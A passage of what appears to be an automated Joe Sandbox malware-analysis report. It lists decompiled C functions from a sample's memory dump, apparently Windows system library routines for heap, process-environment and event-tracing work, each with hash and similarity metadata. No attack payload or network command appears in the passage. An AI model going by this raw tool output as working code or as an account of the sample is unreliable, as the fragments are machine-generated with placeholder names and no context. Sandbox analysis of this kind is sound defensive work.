                                                                                                            										__eflags = _t64;
                                                                                                            										if(_t64 != 0) {
                                                                                                            											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                            										} else {
                                                                                                            											_t67 = 0x7ffe0386;
                                                                                                            										}
                                                                                                            										__eflags =  *_t67;
                                                                                                            										if( *_t67 != 0) {
                                                                                                            											_t67 = E01138B58(_t99);
                                                                                                            										}
                                                                                                            										__eflags =  *((char*)(_t104 - 0x1d));
                                                                                                            										if( *((char*)(_t104 - 0x1d)) != 0) {
                                                                                                            											__eflags = _t99 -  *0x11586c0; // 0xc007b0
                                                                                                            											if(__eflags != 0) {
                                                                                                            												__eflags = _t99 -  *0x11586b8; // 0x0
                                                                                                            												if(__eflags == 0) {
                                                                                                            													_t94 = 0x11586bc;
                                                                                                            													_t87 = 0x11586b8;
                                                                                                            													goto L27;
                                                                                                            												} else {
                                                                                                            													__eflags = _t67 | 0xffffffff;
                                                                                                            													asm("lock xadd [edi], eax");
                                                                                                            													if(__eflags == 0) {
                                                                                                            														E01069240(_t80, _t99, _t99, _t102, __eflags);
                                                                                                            													}
                                                                                                            												}
                                                                                                            											} else {
                                                                                                            												_t94 = 0x11586c4;
                                                                                                            												_t87 = 0x11586c0;
                                                                                                            												L27:
                                                                                                            												E01099B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                                                                                                            											}
                                                                                                            										}
                                                                                                            									} else {
                                                                                                            										goto L13;
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						return E010BD130(_t80, _t99, _t102);
                                                                                                            					} else {
                                                                                                            						 *_t51 = 0x1155388;
                                                                                                            						 *((intOrPtr*)(_t51 + 4)) = _t84;
                                                                                                            						 *_t84 = _t51;
                                                                                                            						 *0x115538c = _t51;
                                                                                                            						goto L6;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}




















                                                                                                            0x010c378b
                                                                                                            0x010c3792
                                                                                                            0x010c3795
                                                                                                            0x00000000
                                                                                                            0x010c3795
                                                                                                            0x00000000
                                                                                                            0x010c3779
                                                                                                            0x010c3798
                                                                                                            0x00000000
                                                                                                            0x010c3798
                                                                                                            0x00000000
                                                                                                            0x010c3768
                                                                                                            0x010c379b
                                                                                                            0x010c379b
                                                                                                            0x010c3751
                                                                                                            0x010c3749
                                                                                                            0x00000000
                                                                                                            0x010c3740
                                                                                                            0x010691a0
                                                                                                            0x010691a3
                                                                                                            0x010691a9
                                                                                                            0x010691b0
                                                                                                            0x00000000
                                                                                                            0x010691b0
                                                                                                            0x01069187
                                                                                                            0x010691b4
                                                                                                            0x010691b4
                                                                                                            0x010691bb
                                                                                                            0x010691c0
                                                                                                            0x010691c5
                                                                                                            0x010691c7
                                                                                                            0x010c37da
                                                                                                            0x010691cd
                                                                                                            0x010691cd
                                                                                                            0x010691cd
                                                                                                            0x010691d2
                                                                                                            0x010691d5
                                                                                                            0x01069239
                                                                                                            0x01069239
                                                                                                            0x010691d7
                                                                                                            0x010691db
                                                                                                            0x010691e1
                                                                                                            0x010691e7
                                                                                                            0x010691fd
                                                                                                            0x01069203
                                                                                                            0x0106921e
                                                                                                            0x01069223
                                                                                                            0x00000000
                                                                                                            0x01069205
                                                                                                            0x01069205
                                                                                                            0x01069208
                                                                                                            0x0106920c
                                                                                                            0x01069214
                                                                                                            0x01069214
                                                                                                            0x0106920c
                                                                                                            0x010691e9
                                                                                                            0x010691e9
                                                                                                            0x010691ee
                                                                                                            0x010691f3
                                                                                                            0x010691f3
                                                                                                            0x010691f3
                                                                                                            0x010691e7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01069134
                                                                                                            0x01069125
                                                                                                            0x0106911d
                                                                                                            0x0106914e
                                                                                                            0x010690d1
                                                                                                            0x010690d1
                                                                                                            0x010690d3
                                                                                                            0x010690d6
                                                                                                            0x010690d8
                                                                                                            0x00000000
                                                                                                            0x010690d8
                                                                                                            0x010690cf

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6499cd8405131daf6797e0261693536952657e3933b572f506648c5e00558328
                                                                                                            • Instruction ID: 4c549760b7a3072b17f7ae12da5bd4bcb5cab8d0b1f934eb93a6616f2dfdb153
                                                                                                            • Opcode Fuzzy Hash: 6499cd8405131daf6797e0261693536952657e3933b572f506648c5e00558328
                                                                                                            • Instruction Fuzzy Hash: EC01F472505200CFE3A99F18D840B117BEDFF41328F2180B6E5559BA92C370DC81CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 46%
                                                                                                            			E010FC450(intOrPtr* _a4) {
                                                                                                            				signed char _t25;
                                                                                                            				intOrPtr* _t26;
                                                                                                            				intOrPtr* _t27;
                                                                                                            
                                                                                                            				_t26 = _a4;
                                                                                                            				_t25 =  *(_t26 + 0x10);
                                                                                                            				if((_t25 & 0x00000003) != 1) {
                                                                                                            					_push(0);
                                                                                                            					_push(0);
                                                                                                            					_push(0);
                                                                                                            					_push( *((intOrPtr*)(_t26 + 8)));
                                                                                                            					_push(0);
                                                                                                            					_push( *_t26);
                                                                                                            					E010A9910();
                                                                                                            					_t25 =  *(_t26 + 0x10);
                                                                                                            				}
                                                                                                            				if((_t25 & 0x00000001) != 0) {
                                                                                                            					_push(4);
                                                                                                            					_t7 = _t26 + 4; // 0x4
                                                                                                            					_t27 = _t7;
                                                                                                            					_push(_t27);
                                                                                                            					_push(5);
                                                                                                            					_push(0xfffffffe);
                                                                                                            					E010A95B0();
                                                                                                            					if( *_t27 != 0) {
                                                                                                            						_push( *_t27);
                                                                                                            						E010A95D0();
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t8 = _t26 + 0x14; // 0x14
                                                                                                            				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                                                                                                            					L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                                                                                                            				}
                                                                                                            				_push( *_t26);
                                                                                                            				E010A95D0();
                                                                                                            				return L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                                                                                                            			}







                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                                            • Instruction ID: ef9577a9cb7ba12a0483aa83da01261dffded3ce89a2a63cbba8ce82d2b9f65e
                                                                                                            • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                                            • Instruction Fuzzy Hash: 6E01967124050ABFE711AF69CD82EA2FBADFF54354F504529F2D442960CB31ECA0C7A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 86%
                                                                                                            			E01134015(signed int __eax, signed int __ecx) {
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				signed char _t10;
                                                                                                            				signed int _t28;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_t28 = __ecx;
                                                                                                            				asm("lock xadd [edi+0x24], eax");
                                                                                                            				_t10 = (__eax | 0xffffffff) - 1;
                                                                                                            				if(_t10 == 0) {
                                                                                                            					_t1 = _t28 + 0x1c; // 0x1e
                                                                                                            					E01082280(_t10, _t1);
                                                                                                            					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                            					E01082280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x11586ac);
                                                                                                            					E0106F900(0x11586d4, _t28);
                                                                                                            					E0107FFB0(0x11586ac, _t28, 0x11586ac);
                                                                                                            					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                                                                                                            					E0107FFB0(0, _t28, _t1);
                                                                                                            					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                                                                                                            					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                                                                                                            						L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                                                                                            					}
                                                                                                            					_t10 = L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                                                                                            				}
                                                                                                            				return _t10;
                                                                                                            			}








                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1135b90b5560c68f0efcbc5a6f2da0a79a769fde6291d7c8d1b6757e4c588c23
                                                                                                            • Instruction ID: 2802f4d20e2c93889f25f98e10be5ae3259b30050c15f2a5e2b77e1974a1a8ce
                                                                                                            • Opcode Fuzzy Hash: 1135b90b5560c68f0efcbc5a6f2da0a79a769fde6291d7c8d1b6757e4c588c23
                                                                                                            • Instruction Fuzzy Hash: C9017C72601946BFD355BB7ACD80E93B7ACFF95660B000229F59887A11CB24EC11C6E4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 61%
                                                                                                            			E0112138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                            				signed int _v8;
                                                                                                            				intOrPtr _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				intOrPtr _v28;
                                                                                                            				short _v54;
                                                                                                            				char _v60;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				signed char* _t21;
                                                                                                            				intOrPtr _t27;
                                                                                                            				intOrPtr _t33;
                                                                                                            				intOrPtr _t34;
                                                                                                            				signed int _t35;
                                                                                                            
                                                                                                            				_t32 = __edx;
                                                                                                            				_t27 = __ebx;
                                                                                                            				_v8 =  *0x115d360 ^ _t35;
                                                                                                            				_t33 = __edx;
                                                                                                            				_t34 = __ecx;
                                                                                                            				E010AFA60( &_v60, 0, 0x30);
                                                                                                            				_v20 = _a4;
                                                                                                            				_v16 = _a8;
                                                                                                            				_v28 = _t34;
                                                                                                            				_v24 = _t33;
                                                                                                            				_v54 = 0x1033;
                                                                                                            				if(E01087D50() == 0) {
                                                                                                            					_t21 = 0x7ffe0388;
                                                                                                            				} else {
                                                                                                            					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                            				}
                                                                                                            				_push( &_v60);
                                                                                                            				_push(0x10);
                                                                                                            				_push(0x20402);
                                                                                                            				_push( *_t21 & 0x000000ff);
                                                                                                            				return E010AB640(E010A9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                            			}


















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d91319217e2ef2d8e78556119b449e421e9b6e4c1fb969ad2cdc91a12937f905
                                                                                                            • Instruction ID: bf16769ad734b0ed204db14fcae331cd9e354b02d759bc32aa5566f9d2dcc033
                                                                                                            • Opcode Fuzzy Hash: d91319217e2ef2d8e78556119b449e421e9b6e4c1fb969ad2cdc91a12937f905
                                                                                                            • Instruction Fuzzy Hash: A8019E71A04319AFCB14EFA8D841EEEBBB8EF54710F404066F940EB280DA749A40CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 61%
                                                                                                            			E011214FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                            				signed int _v8;
                                                                                                            				intOrPtr _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				intOrPtr _v28;
                                                                                                            				short _v54;
                                                                                                            				char _v60;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				signed char* _t21;
                                                                                                            				intOrPtr _t27;
                                                                                                            				intOrPtr _t33;
                                                                                                            				intOrPtr _t34;
                                                                                                            				signed int _t35;
                                                                                                            
                                                                                                            				_t32 = __edx;
                                                                                                            				_t27 = __ebx;
                                                                                                            				_v8 =  *0x115d360 ^ _t35;
                                                                                                            				_t33 = __edx;
                                                                                                            				_t34 = __ecx;
                                                                                                            				E010AFA60( &_v60, 0, 0x30);
                                                                                                            				_v20 = _a4;
                                                                                                            				_v16 = _a8;
                                                                                                            				_v28 = _t34;
                                                                                                            				_v24 = _t33;
                                                                                                            				_v54 = 0x1034;
                                                                                                            				if(E01087D50() == 0) {
                                                                                                            					_t21 = 0x7ffe0388;
                                                                                                            				} else {
                                                                                                            					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                            				}
                                                                                                            				_push( &_v60);
                                                                                                            				_push(0x10);
                                                                                                            				_push(0x20402);
                                                                                                            				_push( *_t21 & 0x000000ff);
                                                                                                            				return E010AB640(E010A9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                            			}


















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: aeccb2b6bbf33a4d3355b41665bc4a81358723d037672092fb293b5d4995c720
                                                                                                            • Instruction ID: 231594bb1061392e50319a674b15660dcce8358791bfb60805f6e8fcfae0aa4e
                                                                                                            • Opcode Fuzzy Hash: aeccb2b6bbf33a4d3355b41665bc4a81358723d037672092fb293b5d4995c720
                                                                                                            • Instruction Fuzzy Hash: D1019E71A00259BFCB14EFA8D841EEEBBB8EF55700F444066F954EB280DA74DA40CB94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 91%
                                                                                                            			E010658EC(intOrPtr __ecx) {
                                                                                                            				signed int _v8;
                                                                                                            				char _v28;
                                                                                                            				char _v44;
                                                                                                            				char _v76;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				intOrPtr _t10;
                                                                                                            				intOrPtr _t16;
                                                                                                            				intOrPtr _t17;
                                                                                                            				intOrPtr _t27;
                                                                                                            				intOrPtr _t28;
                                                                                                            				signed int _t29;
                                                                                                            
                                                                                                            				_v8 =  *0x115d360 ^ _t29;
                                                                                                            				_t10 =  *[fs:0x30];
                                                                                                            				_t27 = __ecx;
                                                                                                            				if(_t10 == 0) {
                                                                                                            					L6:
                                                                                                            					_t28 = 0x1045c80;
                                                                                                            				} else {
                                                                                                            					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                                                                                                            					if(_t16 == 0) {
                                                                                                            						goto L6;
                                                                                                            					} else {
                                                                                                            						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                                                                                                            					}
                                                                                                            				}
                                                                                                            				if(E01065943() != 0 &&  *0x1155320 > 5) {
                                                                                                            					E010E7B5E( &_v44, _t27);
                                                                                                            					_t22 =  &_v28;
                                                                                                            					E010E7B5E( &_v28, _t28);
                                                                                                            					_t11 = E010E7B9C(0x1155320, 0x104bf15,  &_v28, _t22, 4,  &_v76);
                                                                                                            				}
                                                                                                            				return E010AB640(_t11, _t17, _v8 ^ _t29, 0x104bf15, _t27, _t28);
                                                                                                            			}
















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1be5bdc19e1823e2180dcc2da155c13ca792137dcd1a33f52545ab25e58c862a
                                                                                                            • Instruction ID: fc87d10f6015a9b3b17f347b7fc91c693dfda4251088573a48db6fbfc8760ebc
                                                                                                            • Opcode Fuzzy Hash: 1be5bdc19e1823e2180dcc2da155c13ca792137dcd1a33f52545ab25e58c862a
                                                                                                            • Instruction Fuzzy Hash: 8C01A771A00505DFCB54EB69DC04AAE77EDEF451A0F9500A99A9597244DE30ED01C7A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0107B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                                                                                                            				signed char _t11;
                                                                                                            				signed char* _t12;
                                                                                                            				intOrPtr _t24;
                                                                                                            				signed short* _t25;
                                                                                                            
                                                                                                            				_t25 = __edx;
                                                                                                            				_t24 = __ecx;
                                                                                                            				_t11 = ( *[fs:0x30])[0x50];
                                                                                                            				if(_t11 != 0) {
                                                                                                            					if( *_t11 == 0) {
                                                                                                            						goto L1;
                                                                                                            					}
                                                                                                            					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                                            					L2:
                                                                                                            					if( *_t12 != 0) {
                                                                                                            						_t12 =  *[fs:0x30];
                                                                                                            						if((_t12[0x240] & 0x00000004) == 0) {
                                                                                                            							goto L3;
                                                                                                            						}
                                                                                                            						if(E01087D50() == 0) {
                                                                                                            							_t12 = 0x7ffe0385;
                                                                                                            						} else {
                                                                                                            							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                                            						}
                                                                                                            						if(( *_t12 & 0x00000020) == 0) {
                                                                                                            							goto L3;
                                                                                                            						}
                                                                                                            						return E010E7016(_a4, _t24, 0, 0, _t25, 0);
                                                                                                            					}
                                                                                                            					L3:
                                                                                                            					return _t12;
                                                                                                            				}
                                                                                                            				L1:
                                                                                                            				_t12 = 0x7ffe0384;
                                                                                                            				goto L2;
                                                                                                            			}








                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                            • Instruction ID: 49b3f3845d1962292326fe9043976928e87ce13c296a91747b3b82f90b06e1b5
                                                                                                            • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                            • Instruction Fuzzy Hash: 2501D432700584DFE323871CC848F6A7BD8EF85B40F0900E5FA55CB651E628DC40CA64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E01131074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                                                                                            				char _v8;
                                                                                                            				void* _v11;
                                                                                                            				unsigned int _v12;
                                                                                                            				void* _v15;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				char* _t16;
                                                                                                            				signed int* _t35;
                                                                                                            
                                                                                                            				_t22 = __ebx;
                                                                                                            				_t35 = __ecx;
                                                                                                            				_v8 = __edx;
                                                                                                            				_t13 =  !( *__ecx) + 1;
                                                                                                            				_v12 =  !( *__ecx) + 1;
                                                                                                            				if(_a4 != 0) {
                                                                                                            					E0113165E(__ebx, 0x1158ae4, (__edx -  *0x1158b04 >> 0x14) + (__edx -  *0x1158b04 >> 0x14), __edi, __ecx, (__edx -  *0x1158b04 >> 0x14) + (__edx -  *0x1158b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                                                                                                            				}
                                                                                                            				E0112AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                                                                                                            				if(E01087D50() == 0) {
                                                                                                            					_t16 = 0x7ffe0388;
                                                                                                            				} else {
                                                                                                            					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                            				}
                                                                                                            				if( *_t16 != 0) {
                                                                                                            					_t16 = E0111FE3F(_t22, _t35, _v8, _v12);
                                                                                                            				}
                                                                                                            				return _t16;
                                                                                                            			}












                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7c220398d8982a106baab023aaaf3d43738b90ec0dbfc10983864f3d5c20d303
                                                                                                            • Instruction ID: 3b3799c1654687379fbe65ca687c9ac5ab2f07aed8007da9bf1da66da5d1b72b
                                                                                                            • Opcode Fuzzy Hash: 7c220398d8982a106baab023aaaf3d43738b90ec0dbfc10983864f3d5c20d303
                                                                                                            • Instruction Fuzzy Hash: 1B014C72604742EFC718EF69C900B1ABBE5BBC4314F04C529F99593694EF30D455CBA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 59%
                                                                                                            			E0111FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                                            				signed int _v12;
                                                                                                            				intOrPtr _v24;
                                                                                                            				intOrPtr _v28;
                                                                                                            				intOrPtr _v32;
                                                                                                            				short _v58;
                                                                                                            				char _v64;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				signed char* _t18;
                                                                                                            				intOrPtr _t24;
                                                                                                            				intOrPtr _t30;
                                                                                                            				intOrPtr _t31;
                                                                                                            				signed int _t32;
                                                                                                            
                                                                                                            				_t29 = __edx;
                                                                                                            				_t24 = __ebx;
                                                                                                            				_v12 =  *0x115d360 ^ _t32;
                                                                                                            				_t30 = __edx;
                                                                                                            				_t31 = __ecx;
                                                                                                            				E010AFA60( &_v64, 0, 0x30);
                                                                                                            				_v24 = _a4;
                                                                                                            				_v32 = _t31;
                                                                                                            				_v28 = _t30;
                                                                                                            				_v58 = 0x267;
                                                                                                            				if(E01087D50() == 0) {
                                                                                                            					_t18 = 0x7ffe0388;
                                                                                                            				} else {
                                                                                                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                            				}
                                                                                                            				_push( &_v64);
                                                                                                            				_push(0x10);
                                                                                                            				_push(0x20402);
                                                                                                            				_push( *_t18 & 0x000000ff);
                                                                                                            				return E010AB640(E010A9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                                                                            			}

















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fca555e89fc0082fd2b399fedbb1975a4d1e31fdec6824f4bacf4154f8022848
                                                                                                            • Instruction ID: 1b58e302f98ac7820839b9b86b00948b3399f5c480a56207528479c6cb4d0ed1
                                                                                                            • Opcode Fuzzy Hash: fca555e89fc0082fd2b399fedbb1975a4d1e31fdec6824f4bacf4154f8022848
                                                                                                            • Instruction Fuzzy Hash: 22018471A05219ABDB18EFA9D845FAEBBB8EF54700F404066B900EB281DA749941C795
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 59%
                                                                                                            			E0111FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                                            				signed int _v12;
                                                                                                            				intOrPtr _v24;
                                                                                                            				intOrPtr _v28;
                                                                                                            				intOrPtr _v32;
                                                                                                            				short _v58;
                                                                                                            				char _v64;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				signed char* _t18;
                                                                                                            				intOrPtr _t24;
                                                                                                            				intOrPtr _t30;
                                                                                                            				intOrPtr _t31;
                                                                                                            				signed int _t32;
                                                                                                            
                                                                                                            				_t29 = __edx;
                                                                                                            				_t24 = __ebx;
                                                                                                            				_v12 =  *0x115d360 ^ _t32;
                                                                                                            				_t30 = __edx;
                                                                                                            				_t31 = __ecx;
                                                                                                            				E010AFA60( &_v64, 0, 0x30);
                                                                                                            				_v24 = _a4;
                                                                                                            				_v32 = _t31;
                                                                                                            				_v28 = _t30;
                                                                                                            				_v58 = 0x266;
                                                                                                            				if(E01087D50() == 0) {
                                                                                                            					_t18 = 0x7ffe0388;
                                                                                                            				} else {
                                                                                                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                            				}
                                                                                                            				_push( &_v64);
                                                                                                            				_push(0x10);
                                                                                                            				_push(0x20402);
                                                                                                            				_push( *_t18 & 0x000000ff);
                                                                                                            				return E010AB640(E010A9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                                                                            			}

















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4e61c213b82f1dd16700a892fcbcd6621b1fd67c5d64bcc52029ce5815838904
                                                                                                            • Instruction ID: aac797c569ff52df68dff700cd2e05c2a09c278936e0ec4ff675c059db8ab067
                                                                                                            • Opcode Fuzzy Hash: 4e61c213b82f1dd16700a892fcbcd6621b1fd67c5d64bcc52029ce5815838904
                                                                                                            • Instruction Fuzzy Hash: 96018471A0421AABDB14EFA9D845FAEBBB8EF55700F444066B900EB280DA749A41C7D5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 54%
                                                                                                            			E01138A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                            				signed int _v12;
                                                                                                            				intOrPtr _v24;
                                                                                                            				intOrPtr _v28;
                                                                                                            				intOrPtr _v32;
                                                                                                            				intOrPtr _v36;
                                                                                                            				intOrPtr _v40;
                                                                                                            				short _v66;
                                                                                                            				char _v72;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				signed char* _t18;
                                                                                                            				signed int _t32;
                                                                                                            
                                                                                                            				_t29 = __edx;
                                                                                                            				_v12 =  *0x115d360 ^ _t32;
                                                                                                            				_t31 = _a8;
                                                                                                            				_t30 = _a12;
                                                                                                            				_v66 = 0x1c20;
                                                                                                            				_v40 = __ecx;
                                                                                                            				_v36 = __edx;
                                                                                                            				_v32 = _a4;
                                                                                                            				_v28 = _a8;
                                                                                                            				_v24 = _a12;
                                                                                                            				if(E01087D50() == 0) {
                                                                                                            					_t18 = 0x7ffe0386;
                                                                                                            				} else {
                                                                                                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                            				}
                                                                                                            				_push( &_v72);
                                                                                                            				_push(0x14);
                                                                                                            				_push(0x20402);
                                                                                                            				_push( *_t18 & 0x000000ff);
                                                                                                            				return E010AB640(E010A9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                                                                                                            			}

















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6e302188008d36a21481c5ca9e54b962e2d9df92bd2326ac2defc709aefa6231
                                                                                                            • Instruction ID: a55bc43d05016525eb3f5c1bfc468873e9b3dad117d829af15ddbd89691bbbe0
